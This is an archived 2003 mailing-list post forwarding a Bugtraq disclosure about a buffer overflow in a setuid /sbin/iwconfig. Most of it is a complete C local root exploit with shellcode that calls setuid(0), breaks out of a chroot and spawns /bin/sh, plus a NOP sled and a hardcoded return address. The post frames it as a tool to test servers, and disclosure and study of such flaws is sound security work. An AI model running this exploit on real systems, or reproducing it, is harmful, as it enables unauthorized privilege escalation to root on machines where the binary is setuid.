[driverloader] iwconfig vulnerability - the last code was demaged
sending by email (fwd)
Jan Slupski
jslupski at email.com
Thu Nov 13 00:00:02 EST 2003
>From Bugtraq...
may interest somebody on the list
All the best
Jan
_ _ _ _ _____________________________________________
| |_| |\ | S L U P S K I jslupski at email.com
|_| | | | \| http://www.juljas.net
---------- Forwarded message ----------
Date: Thu, 13 Nov 2003 01:25:39 +0200
From: hekuran doli <hekuran.doli at atikos.info>
To: bugtraq at securityfocus.com
Subject: iwconfig vulnerability - the last code was demaged sending by email
***************************************************************************
iwconfig is a tool that manipulate the basic wireless parameters, allowing
privilege escalation due to buffer overflow vulnerability. The iwconfig is
not setuid by default, but I have seen in several places it was. The flowing
exploit has been released to test your servers.
/*
Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode,
dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters
*/
#include <stdio.h>
#define BIN "/sbin/iwconfig"
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
"\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
"\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
"\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
"\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
"\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
"\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
int
main ()
{
int x;
char buf[97], out[1337], *buffer;
unsigned long ret_add = 0xbffffbb8, *add_ptr ;
buffer = buf;
add_ptr = (long *)buffer;
for (x=0; x<97-1; x+=4)
*(add_ptr++)=ret_add;
memset ((char *)out, 0x90, 1337);
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
memcpy((char *)out, "OUT=", 4);
putenv(out);
execl (BIN, BIN, buf, NULL);
return 0;
}
***************************************************************************
--
Open WebMail Project (http://openwebmail.org)
More information about the driverloader
mailing list